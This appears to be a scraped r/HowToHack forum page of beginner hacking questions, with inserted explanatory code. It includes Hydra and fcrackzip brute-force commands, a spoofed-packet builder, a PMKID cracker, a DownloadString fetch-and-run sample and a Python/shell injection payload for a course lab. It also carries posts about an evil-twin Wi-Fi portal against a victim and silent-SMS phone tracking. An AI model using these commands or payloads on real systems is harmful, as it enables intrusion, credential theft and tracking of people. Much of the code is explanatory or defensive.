/r/HowToHack
Welcome! This is your open hacker community designed to help you on the journey from neophyte to veteran in the world of underground skillsets. Ask, Answer, Learn.
I am looking for an open source script to make a bad USB. I would much prefer it be based on an Arduino as I am much more comfortable with Arduino's language than Python, but I'll take what I can get.
I want to make a USB that when plugged in will run the payload script, then function normally as a mass storage device. I found a GitHub for a Raspberry Pi that kind of did that but required connecting two pins in order to change the mode. I am OK with modifying code, but I don't wanna rewrite the whole thing.
Was thinking Arduino Leonardo was the way to go hardware wise but I'm not set on that.
Hello, I'm trying to brute force my router with the correct password contained within a text file. However, Hydra keeps returning that all passwords from the file are correct. Where am I going wrong?
Terminal:
┌──(root㉿localhost)-[/home/kali]
└─# hydra -l admin -P passwords.txt 192.168.1.1 http-get /login.php
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-09 19:04:08
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking http-get://192.168.1.1:80/login.php
[80][http-get] host: 192.168.1.1   login: admin   password: password
[80][http-get] host: 192.168.1.1   login: admin   password: admin
[80][http-get] host: 192.168.1.1   login: admin   password: user
[80][http-get] host: 192.168.1.1   login: admin   password: 1234
[80][http-get] host: 192.168.1.1   login: admin   password: qwerty1234
[80][http-get] host: 192.168.1.1   login: admin   password: nekasifra
[80][http-get] host: 192.168.1.1   login: admin   password: ztonpk
1 of 1 target successfully completed, 7 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-09 19:04:08

┌──(root㉿localhost)-[/home/kali]
└─# cat passwords.txt
password
admin
user
1234
qwerty1234
ztonpk
nekasifra
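Why every word in the list comes back as a "valid password", reproduced against a throwaway login page. This is an added example, not part of the post above: a local server (constructed for the demo) answers 200 to any GET on /login.php, which is how many embedded router UIs behave. hydra's http-get module speaks HTTP Basic auth and, roughly, counts only a 401/403 as a failure, so a form-based page that always returns 200 makes every guess look like a hit. The second check is what http-post-form does: submit the form fields and declare success only when a failure string is absent. The field names (user, pass) and the failure string ("Login failed") are assumptions here; they must be read off the real router's login page.

```python
import base64
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CORRECT_PASSWORD = "ztonpk"   # constructed: the "real" router password for the demo
WORDLIST = ["password", "admin", "user", "1234", "qwerty1234", "ztonpk", "nekasifra"]
FAIL_MARKER = "Login failed"  # assumed failure string; read it off the real page

# Bypass any proxy settings so the demo only talks to 127.0.0.1.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class FormLoginHandler(BaseHTTPRequestHandler):
    """Toy router UI: a form page that returns 200 to every GET, like many embedded web servers."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<form method=post><input name=user><input name=pass></form>")

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = fields.get("pass", [""])[0] == CORRECT_PASSWORD
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Welcome admin" if ok else FAIL_MARKER.encode())

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FormLoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def basic_auth_guess(base_url, user, password):
    """Roughly what hydra's http-get module does: send HTTP Basic credentials and
    treat anything but a 401/403 as a valid login."""
    req = urllib.request.Request(base_url + "/login.php")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    try:
        with OPENER.open(req) as resp:
            return resp.status not in (401, 403)
    except urllib.error.HTTPError as err:
        return err.code not in (401, 403)


def form_guess(base_url, user, password):
    """What http-post-form does: submit the login form and call it a hit only when
    the failure string is absent from the response body."""
    data = urllib.parse.urlencode({"user": user, "pass": password}).encode()
    with OPENER.open(base_url + "/login.php", data=data) as resp:
        return FAIL_MARKER not in resp.read().decode()


def run_wordlist(check, base_url, user, wordlist):
    return [pw for pw in wordlist if check(base_url, user, pw)]


def demo():
    srv = start_server()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    try:
        basic = run_wordlist(basic_auth_guess, base, "admin", WORDLIST)
        form = run_wordlist(form_guess, base, "admin", WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()
    return basic, form


if __name__ == "__main__":
    basic, form = demo()
    print("status-code check (http-get):    ", basic)  # every word "works"
    print("failure-string check (post-form):", form)   # only the real one
```

The hydra equivalent of the second check, with the same assumed field names and failure string, is hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Login failed". Use http-get only when the target actually challenges with a 401 and WWW-Authenticate: Basic.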
I can’t find anything on it. I was watching a video about how a new ransomware gang was hiding malicious code in regular files through alternate data streams; then extracting this through a malicious .lnk
Hey, I was just curious if an attacker can spoof a public IP address and then try sending it a malformed packet from the spoofed IP address. If yes, how?
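What "spoofing a source address" means at the packet level, as an added example that is not part of the post: the IPv4 source address is a plain 4-byte field that the sender fills in, so a raw socket with IP_HDRINCL can put any value there. The addresses below are RFC 5737 documentation ranges (constructed). Caveats a practitioner would want: sending needs root or CAP_NET_RAW; on Linux the kernel recomputes the header checksum itself when IP_HDRINCL is set; many upstream networks drop packets whose source is not theirs (BCP 38 egress filtering); and any reply goes to the spoofed host, so the sender never sees it. The send function is shown but not called.

```python
import socket
import struct


def ipv4_checksum(header: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int,
                      proto: int = socket.IPPROTO_UDP, ident: int = 0x1234) -> bytes:
    """20-byte IPv4 header; `src` is whatever the caller claims, nothing checks it."""
    ver_ihl = (4 << 4) | 5                  # version 4, 5 x 32-bit words
    total_len = 20 + payload_len
    hdr = struct.pack("!BBHHHBBH4s4s",
                      ver_ihl, 0, total_len, ident, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    csum = ipv4_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def build_spoofed_packet(src: str, dst: str, payload: bytes) -> bytes:
    """Header plus an arbitrary (here deliberately junk) payload; the sender decides all of it."""
    return build_ipv4_header(src, dst, len(payload)) + payload


def parse_src_dst(packet: bytes):
    """What the receiver sees: it can only read the claimed source, not verify it."""
    return socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20])


def send_raw(packet: bytes, dst: str) -> None:
    """Needs CAP_NET_RAW; IP_HDRINCL tells the kernel to use our header as-is
    (Linux still fills the checksum, and the id if it is zero)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.sendto(packet, (dst, 0))


if __name__ == "__main__":
    # constructed addresses from RFC 5737; 8 zero bytes is an intentionally malformed UDP header
    pkt = build_spoofed_packet("203.0.113.7", "198.51.100.9", b"\x00" * 8)
    print(parse_src_dst(pkt), "checksum ok:", ipv4_checksum(pkt[:20]) == 0)
```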
Hello!
Posting here as my submission has been removed from r/hacking
I am doing a presentation on wireless hacking soon. I will be cracking the password on my phone's hotspot for the demo. I am able to consistently capture the WPA 4 way handshakes (with the help of an audience member connecting to the hotspot) and crack them but I am very rarely able to capture PMKID of the hotspot. I remember doing it before but I might be wrong because I'm not sure if hotspots even have roaming capabilities/the usage of PMKID. If anyone has any ideas I'd love to hear them!
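How the PMKID is derived and checked, as an added example that is not part of the post or of any tool mentioned in it. The PMKID that hashcat mode 22000 attacks is the first 16 bytes of HMAC-SHA1 over "PMK Name" || AP MAC || station MAC, keyed with the PMK (PBKDF2-HMAC-SHA1 of the passphrase and SSID, 4096 rounds, 32 bytes). An AP only puts it in the RSN IE of EAPOL message 1 if it supports PMKSA caching, which is why some hotspots never yield one while the 4-way handshake still works. SSID, passphrase, MACs and wordlist below are constructed.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); no client traffic is needed
    beyond a single association attempt, which is what makes the attack 'clientless'."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(captured: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    """The line format hcxpcapngtool writes for hashcat -m 22000 (PMKID variant, type 01)."""
    return f"WPA*01*{captured.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


def crack_pmkid(captured: bytes, ssid: str, ap_mac: bytes, sta_mac: bytes, wordlist):
    """Offline check: derive a PMKID per candidate and compare in constant time."""
    for candidate in wordlist:
        guess = pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, captured):
            return candidate
    return None


# constructed demo values
SSID = "DemoHotspot"
AP_MAC = bytes.fromhex("aabbccddeeff")
STA_MAC = bytes.fromhex("112233445566")
REAL_PASSPHRASE = "correct horse"
WORDLIST = ["password", "12345678", "correct horse", "hotspot123"]


def demo():
    captured = pmkid(pmk_from_passphrase(REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC)
    return hashcat_22000_line(captured, AP_MAC, STA_MAC, SSID), \
        crack_pmkid(captured, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    line, found = demo()
    print(line)
    print("recovered:", found)
```

Because the PMKID depends only on PMK and the two MACs, one captured PMKID per AP is enough; the 4096-round PBKDF2 per candidate is the entire cost of the attack, which is why the SSID-specific derivation cannot be precomputed across networks.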
So this may be a stupid question, but I'm starting to learn external pentesting. I host my own dedicated gaming server (Palworld & Enshrouded) at my house, and I have a handful of port forwards punched through the firewall. I have, what I feel, a very safe dedicated server as I've hardened Windows quite a bit, have VLANs & ACLs set, have IPS enabled, and have Wazuh monitoring the server.
However, I'd like to try attempting to break into the server from the outside.
If I join my Kali machine to my cell hotspot, and run an aggressive nmap scan against my public IP, do I need to worry about my ISP on either ends? They won't like down my internet for a certain time period will they?
Unable to negotiate with ... port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
Please I've been battling with this error on my kali for longer than usual
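The message means the server only offers host key algorithms that the client has dropped from its defaults: ssh-dss was disabled in OpenSSH 7.0 and ssh-rsa (RSA signed with SHA-1) in OpenSSH 8.8, so a current Kali client refuses both. The client-side workaround, as an added example that is not from the post, is to re-enable ssh-rsa for that one host only, never globally; the alias and address below are placeholders.

```ssh_config
# ~/.ssh/config (added example; host alias and address are placeholders)
Host oldbox
    HostName 192.0.2.10
    # allow the legacy RSA/SHA-1 host key only for this host
    HostKeyAlgorithms +ssh-rsa
    # only needed if your own RSA key is also refused for authentication
    # (this option was called PubkeyAcceptedKeyTypes before OpenSSH 8.5)
    PubkeyAcceptedAlgorithms +ssh-rsa
```

The one-off form is ssh -o HostKeyAlgorithms=+ssh-rsa user@host. Prefer +ssh-rsa over +ssh-dss: DSA keys are fixed at 1024 bits. The real fix is on the server, which is old enough that an upgrade (or at least generating an ed25519 host key) is the better answer.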
For an assignment at uni I need to find some vulnerability in any two popular websites. Can someone suggest some popular websites that might be vulnerable to popular attacks, and recommend some tools that I can use for finding the vulnerabilities?
My Zoom G1on pedal is bricked; this is my favorite and most useful one and I need to use it in my next event. I saw that with a C341A device and BIOS I can rewrite it, but I don't find the file. I tried extracting it from firmware.exe, but unsuccessfully. Can anyone help me?
I genuinely have 0 clue where to start, I’ve done IL2CPP hacking at a beginner level with standard Windows games but I have never tampered with browser games. From what I know I can use JavaScript to interact with different Unity Objects, but I am not exactly sure how to and where to learn to. Any leads or anything that can help me out a bit?
So I sometimes watch anti-virus videos when I'm bored and there's something that I've never understood about how they work.
A criminal might store a malicious command in a variable (ex: blabla = "command to connect to malicious ip"). However, anti-viruses will see that variable and detect that the variable is a malicious command and will label the program as malware.
What cyber-criminals do instead is split and scatter the command across different variables (ex: the word "Download" and the word "String" might be stored in 2 different variables, but then joined together and then run as a command).
Obviously, since the anti-virus sees the variable "Download" and the variable "String" instead of "DownloadString", it thinks that there's no threat. Up to that point, I understand.
However, the cyber-criminal still needs to join those two words to then run the full command. So how does the anti-virus not detect (at the point in the code where the 2 variables are joined before being run as a command) the program as malicious?
ex:
part1 = "Download" // anti-virus: its safe
part2 = "String" // anti-virus: its safe
run_command(part1 + part2) // anti-virus: wait, its trying to run "DownloadString", thats bad!!
What am I missing? If the anti-virus gets bypassed with that, then it's dumb. But if the anti-virus doesn't get bypassed with that, then what's the point of them trying to hide the command? Or am I just wrong in my understanding of how anti-viruses work?
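The two detection points in the question, modelled side by side. This is an added example, not from the post: a static scan looks at the script file as it sits on disk, so a signature for "DownloadString" never matches a file that only contains "Download" and "String" as separate literals. A runtime inspection point (on Windows this is what AMSI does: PowerShell hands the script content to the registered scanner at invocation time) sees the string after concatenation, which is exactly the gap the splitting trick does not close. The sample scripts and the signature list are constructed; run_command stands in for the interpreter.

```python
import re

# Constructed signatures; real AV content is far richer, but the principle is the same.
SIGNATURES = [re.compile(r"DownloadString", re.I), re.compile(r"Invoke-Expression", re.I)]

# Constructed samples written as Python so the demo can execute them.
PLAIN_SAMPLE = """
run_command("(New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')")
"""

SPLIT_SAMPLE = """
part1 = "Download"
part2 = "String"
run_command("(New-Object Net.WebClient)." + part1 + part2 + "('http://203.0.113.5/x.ps1')")
"""


def static_scan(source: str):
    """File-on-disk scan: only literal text is visible, nothing is executed."""
    return [sig.pattern for sig in SIGNATURES if sig.search(source)]


class RuntimeHook:
    """Stand-in for an AMSI-style hook: it receives the string actually handed
    to the interpreter, after every concatenation has already happened."""

    def __init__(self):
        self.seen = []      # everything the interpreter was asked to run
        self.blocked = []   # what the signatures matched at runtime

    def run_command(self, cmd: str):
        self.seen.append(cmd)
        hits = [sig.pattern for sig in SIGNATURES if sig.search(cmd)]
        if hits:
            self.blocked.append(cmd)
            raise PermissionError("blocked by runtime scan: " + ", ".join(hits))
        return "executed: " + cmd


def run_with_hook(source: str, hook: RuntimeHook) -> str:
    """Execute the sample with run_command wired to the hook; report the verdict."""
    try:
        exec(source, {"run_command": hook.run_command})
        return "ran"
    except PermissionError as err:
        return str(err)


def demo():
    hook = RuntimeHook()
    return {
        "static_plain": static_scan(PLAIN_SAMPLE),    # caught on disk
        "static_split": static_scan(SPLIT_SAMPLE),    # nothing to match
        "runtime_split": run_with_hook(SPLIT_SAMPLE, hook),  # caught at execution
        "runtime_saw": hook.seen,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Splitting strings only defeats the on-disk scan; it is why the next steps in real malware are aimed at the runtime layer itself (tampering with the scanning hook, or encoding so that even the assembled string does not match until the last moment).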
I am debating between using Tails USB or Whonix on VM with full disk encryption. The tails USB I can remove whenever I am done using it and clear my RAM so I am leaning towards that. I am planning on using public WiFi and not logging into any social media. How hard would it be to track me and possibly find out who I am or my location? Do tails and whonix spoof mac address? How could I clear all the data stored? Do I need to take any extra precautions like external wifi? Thank you for tips or advice.
Where should i begin and what languages would i need to use?
I already know of the infamous 42 .zip, but I’ve seen shitposts of people claiming to have zip bombs that extract to 55 yottabytes and even up to 195 yottabytes (though I think this one was a fake/parody of the 55 yottabytes one) but don’t have any source of where the download is which makes sense. Basically I’m looking for a maximally destructive zip bomb (preferably at least a yottabyte) because I am simply bored.
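The defender's side of the same topic, as an added example that is not from the post: the only thing that makes a zip bomb dangerous is an extractor that trusts the archive. A practitioner checks the central directory (declared size versus compressed size per entry, nested archives like the layers of 42.zip, total declared size) before extracting, and still bounds the bytes actually inflated, because the headers can lie. The archive below is constructed in memory from a few megabytes of zeros, which deflate shrinks roughly 1000:1.

```python
import io
import zipfile


def make_demo_zip(size_mb: int = 4) -> bytes:
    """Constructed sample: one highly compressible entry plus a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("zeros.bin", b"\x00" * (size_mb * 1024 * 1024))
        zf.writestr("readme.txt", b"harmless text\n")
    return buf.getvalue()


def inspect_archive(data: bytes, max_ratio: float = 100.0,
                    max_total: int = 256 * 1024 * 1024) -> dict:
    """Pre-extraction triage from the central directory only; nothing is inflated."""
    total = 0
    worst = 0.0
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size
            ratio = info.file_size / max(info.compress_size, 1)
            worst = max(worst, ratio)
            if ratio > max_ratio:
                findings.append(f"{info.filename}: ratio {ratio:.0f}:1")
            if info.filename.lower().endswith(".zip"):
                findings.append(f"{info.filename}: nested archive")
    if total > max_total:
        findings.append(f"declared total {total} bytes exceeds {max_total}")
    return {"total": total, "worst_ratio": worst, "safe": not findings, "findings": findings}


def read_bounded(data: bytes, name: str, limit: int) -> bytes:
    """Inflate one member but stop at `limit` bytes, whatever the header claimed."""
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        while chunk := member.read(64 * 1024):
            out += chunk
            if len(out) > limit:
                raise ValueError(f"{name}: exceeded {limit} bytes while inflating")
    return bytes(out)


if __name__ == "__main__":
    archive = make_demo_zip()
    print(inspect_archive(archive))
    try:
        read_bounded(archive, "zeros.bin", 1024 * 1024)
    except ValueError as err:
        print(err)
```

Ratio and total checks catch the flat bombs; the nested-archive check is what matters for 42.zip-style layering, where each layer looks small until it is opened. Apply the same bound when extracting archives found inside archives.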
Hello, currently taking part in a cyber security contest and I can't seem to figure out this encrypted message.
GzI2MKVtLKWaqJHtq2y0nPO0nTHtMTS0LF4X
The clue for the message is "every symbol has a meaning, can you figure it out?"
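A way to work such a string, as an added example that is not part of the post: the text is made only of base64 alphabet characters but does not decode to anything readable, which suggests a letter substitution applied on top of the encoding. Rotating the letters (digits and padding untouched) by every possible shift and base64-decoding each candidate, keeping only the ones that come out as printable text, finds the one that was used; the code below generalizes the rot13 case to all 25 shifts.

```python
import base64
import binascii

CHALLENGE = "GzI2MKVtLKWaqJHtq2y0nPO0nTHtMTS0LF4X"   # the string from the post


def rot_letters(s: str, n: int) -> str:
    """Caesar-shift A-Z and a-z by n; digits, '+', '/' and '=' stay as they are
    so the result remains a syntactically valid base64 string."""
    out = []
    for ch in s:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + n) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + n) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def printable(data: bytes) -> bool:
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def rot_then_b64(s: str):
    """Try every shift, base64-decode, keep (shift, text) pairs that look like text."""
    hits = []
    for n in range(1, 26):
        candidate = rot_letters(s, n)
        try:
            raw = base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
        if raw and printable(raw):
            hits.append((n, raw.decode("ascii")))
    return hits


if __name__ == "__main__":
    for shift, text in rot_then_b64(CHALLENGE):
        print(f"rot{shift}: {text!r}")
```

The same loop is worth keeping for other CTF strings of this shape: check the alphabet first (only base64 characters, length a multiple of 4), then try the cheap transformations before reaching for anything heavier.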
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $_redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../etc/passwd :
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
| http://www.exploit-db.com/exploits/1244/
I recently did an nmap scan on a host I had on my old webserver (it was in the backyard, I got it out recently while cleaning; I haven't updated it in a while, ik). Can anyone explain this vulnerability to me? Is there any way this can be exploited? I really wanna try to exploit it myself.
Every couple of weeks (sometimes multiple times per week) for the past 3 years someone makes an account on Instagram (it's multiple people, honestly) and tries DMing me. I usually ignore them, but sometimes they can get very rude or just outright spam the hell out of me. It's gotten better as you have to accept people for them to send more than one message now, but it still gets on my nerves sometimes. They used to go as far as calling me multiple times to try to get me to reply. It's been years and I wanted to know if there is any way to find out who they are. I don't want to get into the account or see who else they harass. I just want to know who the individuals harassing me for the past three years are. Idk if anybody has an answer tbh, but please help me if you can.
I saw this app on the Google store called Hacker X, so I just want to ask if it is useful or just bullshit.
Hello again, thanks for the kind and helpful advice in the past. Coming here with yet another question: I was playing with BeEF a little and found out that if I want to hook browsers outside of my network I would have to create a cloud. So I did just that, created a Lindo, followed every single step successfully, waited for an hour for BeEF to install... And when it was time for me to run the command cat /root/beef.info it says that it does not exist. Keep in mind that I already accessed it in my terminal via SSH key auth. Any help?
P.S. I've searched like everywhere and no signs of it; I did not just stop at root or /etc.
I am a person that is new to hacking and I wanna buy some gadgets, and I have some trouble: I wanna buy something called a WiFi Nugget and a USB Nugget, but they're both the same besides the name. What is the difference between them, and if they're the same, which one should I get?
From what I learned, I run the ARP spoof with bettercap and hstshijack to downgrade the HTTPS pages to HTTP and inject the BeEF payload (or any JS code) to run on the client machine. But in my practice, it seems to be deprecated and the pages continue in HTTPS. I tried to use SSLStrip but got no success. How does this hack run nowadays? Can anyone help me?
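Why the pages stay on HTTPS, modelled as an added example that is not part of the post or of bettercap: browsers keep an HSTS store (RFC 6797) and, once a host has sent a Strict-Transport-Security header (or is on the built-in preload list), every later plain-HTTP request to it is rewritten to HTTPS before it leaves the browser, so there is nothing on the wire for sslstrip to rewrite. The only openings left are a host the browser has never seen over HTTPS, an expired policy, or a lookalike hostname not covered by a policy, which is the gap hostname-spoofing approaches such as hstshijack's DNS tricks aim at. Hostnames and header values below are constructed.

```python
import time


class HstsCache:
    """Minimal model of a browser's HSTS store: host -> (expiry, includeSubDomains)."""

    def __init__(self, preload=()):
        self.entries = {}
        for host in preload:                     # built-in list: never expires
            self.entries[host] = (float("inf"), True)

    def observe(self, host: str, header: str, now=None):
        """Record a Strict-Transport-Security header received over HTTPS.
        (Browsers ignore the header when it arrives over plain HTTP.)"""
        now = time.time() if now is None else now
        max_age, include_sub = None, False
        for directive in header.split(";"):
            name, _, value = directive.strip().partition("=")
            if name.lower() == "max-age":
                max_age = int(value.strip('" '))
            elif name.lower() == "includesubdomains":
                include_sub = True
        if max_age is None:
            return
        if max_age == 0:                         # explicit policy removal
            self.entries.pop(host, None)
        else:
            self.entries[host] = (now + max_age, include_sub)

    def must_upgrade(self, host: str, now=None) -> bool:
        """True when the browser would rewrite http://host to https:// itself."""
        now = time.time() if now is None else now
        labels = host.split(".")
        for i in range(len(labels)):
            parent = ".".join(labels[i:])
            entry = self.entries.get(parent)
            if entry and entry[0] > now and (i == 0 or entry[1]):
                return True
        return False


def demo():
    """Scenario: a bank seen once over HTTPS, a shop with a host-only policy, a preloaded site."""
    cache = HstsCache(preload=["paypal.example"])
    cache.observe("bank.example", "max-age=31536000; includeSubDomains", now=1000)
    cache.observe("www.shop.example", "max-age=3600", now=1000)
    return {
        "bank_now": cache.must_upgrade("www.bank.example", now=2000),     # stripped? no
        "bank_expired": cache.must_upgrade("bank.example", now=40_000_000),
        "shop_exact": cache.must_upgrade("www.shop.example", now=1500),
        "shop_lookalike": cache.must_upgrade("wwww.shop.example", now=1500),  # no policy
        "preloaded": cache.must_upgrade("login.paypal.example", now=0),
        "first_visit": cache.must_upgrade("never-seen.example", now=0),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {'browser forces HTTPS' if value else 'plain HTTP possible'}")
```

The two False results are the whole remaining attack surface for a downgrade: a first visit to an unlisted host, and a hostname that no policy covers. Sites that set includeSubDomains and are preloaded leave neither.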
I'm guessing this is relatively feasible with 1million possible combinations, is there any software out there that can work with those parameters (i.e. only try 6 digit numerical passwords)?
EDIT: Got this done with fcrackzip!
fcrackzip -b -c '1' -l 6-6 -u <file path>
I will post the original version and the encrypted one. These are for a game silkroad I just want to understand what the encryption method is. The one encrypted could be a little bit different but it's mostly the same as the encrypted one.
https://drive.google.com/file/d/1fZberoXiCyOPsc2hZD6w9Ne9mzd95Wu\_/view?usp=sharing, https://drive.google.com/file/d/1qmV8zDfb4tDy4CKEc0fruGon3hApIW5w/view?usp=sharing
i know there are groups like anonymous and stuff but how do you get into those groups and how do you find different hacker groups?
What OS is best for running on older 32 bit desktop? I want to do so much but am unsure where to start …
IF you learn how to exploit a specific vulnerability of the system, master it, try it in production, then the next day it is patched; retry to rediscover a vulnerability, exploit it, and again it is patched...
How can you keep up with learning how to break things and penetrate them while those are getting fixed, and what you learned is deprecated and useless?
Not only this, but any free and easy-to-find tutorials have ONLY academic examples, most of which are useless in the work field, presenting already patched vulnerabilities; and any vulnerability that is not so old is ONLY presented in a pseudo manner, where it is specified what it is, how it works, "update your system as the fix".
...
Don't those things make you want to quit the journey, since everything learned and used will one day (even the day after) be obsolete because a fix was deployed?
I saw questions about "how to" and "why to", but nothing about the frustration factor of finding and exploiting a vulnerability and its ways of exploiting that vulnerability.
I'm interested to find out if two mobile phone numbers are connected to the same base-station(or in the same location).
Do you have any ideas?
Could silent SMS help out? I tried to find something around the RTT(round trip time)/delivery time comparing, but nothing came up.
Hello folks: hackers and pentesters; coders and programmers; developers... crackers... cyber attackers... I don't know half of you half as well as I should like; and I like less than half of you half as well as you deserve. I've been using airgeddon for quite some time now and am enjoying it; however, I faced an issue lately which doesn't seem to be a bug, but the way captive portals work. I created an AP with captive portals in airgeddon (option 9). I got my victim to access my rogue AP, but he entered an incorrect code, and now my AP name is registered in his device. So, whenever I launch my attack, the victim logs automatically into my AP without seeing the captive portal in which he can write the passphrase, since my AP name is already registered in his device! My questions are: Is there a way to REGENERATE the captive portal using airgeddon or other tools? Is there a way to create an AP with a custom name in airgeddon? Note: my inquiry is for educational purposes only.
For an ethical hacking course I got provided a Docker container, to which I have access and can see the backend code.
It's an HTTP server with 5 quests; the whole point is to be able to bypass the function and be able to read the treasure1.txt that is next to it in the backend.
If someone could help me with the input to give for the others, it would be highly appreciated.
function1, python based [solved]:
calculator, you have 2 textboxes, the values of both will be added up and returned
solved, I gave __import__('os').popen('cat treasure1.txt').read() in both boxes and got the read output back
for the other functions I'm stuck
function2, python based
there is 1 textbox, the backend converts the text to uppercase characters and returns the output
the code:
elif self.path in [ "/issue2.cgi" ]:
    wrd = b' '.join(postvars.get(b'wrd', [])).decode('ascii')
    cmd = f"'{wrd}'.upper()"
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        res = eval(cmd)
function3, python based
there are 2 boxes, the first one is a textbox and the other one a digit number; let's say I give "aap" and in the other box "3" -> it will return "aap aap aap"
the code:
elif self.path in [ "/issue3.cgi" ]:
    fct1 = b' '.join(postvars.get(b'fct1', [])).decode('ascii')
    fct2 = b' '.join(postvars.get(b'fct2', [])).decode('ascii')
    cmd = f"print('{fct1}' * {fct2})"
    logging.debug(f"do_POST: post={self.path} cmd={cmd}")
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        res = exec(cmd)
function4, shell based
same as function2, it returns the sum of 2 numbers; you have 2 textboxes, but now the sum gets calculated via shell
the code:
elif self.path in [ "/issue4.cgi" ]:
    fct1 = b' '.join(postvars.get(b'fct1', [])).decode('ascii')
    fct2 = b' '.join(postvars.get(b'fct2', [])).decode('ascii')
    cmd = f"/usr/bin/expr {fct1} + {fct2}"
    logging.debug(f"do_POST: post={self.path} cmd={cmd}")
    with subprocess.Popen([ '/bin/sh', '-c', cmd ], bufsize=4096,
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
        lines = [ line.decode('ascii').strip() for line in p.stdout ]
function5, shell based
you can execute shell commands like "ls -l treasure1.txt" but it does not allow directly the "cat" command
elif self.path in [ "/issue5.cgi" ]:
    cmd = b' '.join(postvars.get(b'cmd', [])).decode('ascii')
    logging.debug(f"do_POST: post={self.path} cmd={cmd}")
    with subprocess.Popen([ '/bin/sh', '-c', cmd ], bufsize=4096,
                          stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
        lines = [ line.decode('ascii').strip() for line in p.stdout ]
help is appreciated
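The four remaining handlers reduced to plain functions, driven with inputs that make each one read treasure1.txt, plus the hardened form of the shell one. This is an added example built from the code quoted in the post; it is not the course's own code. The file contents are constructed in a temporary directory. The excerpt for issue5 shows no filter, so the substring check on "cat" is an assumption standing in for whatever the container actually does; the quoting trick only defeats a check of that shape. The common thread is that every handler splices user text into something that is then evaluated (eval, exec, or sh -c), so the input only has to close the literal it lands in and open a new one.

```python
import contextlib
import io
import os
import subprocess
import tempfile

TREASURE = "flag{constructed-for-this-example}"   # constructed file contents


# --- the challenge's handlers, stripped of the HTTP plumbing ---

def issue2(wrd):
    cmd = f"'{wrd}'.upper()"
    f = io.StringIO()
    with contextlib.redirect_stdout(f):
        res = eval(cmd)
    return res


def issue3(fct1, fct2):
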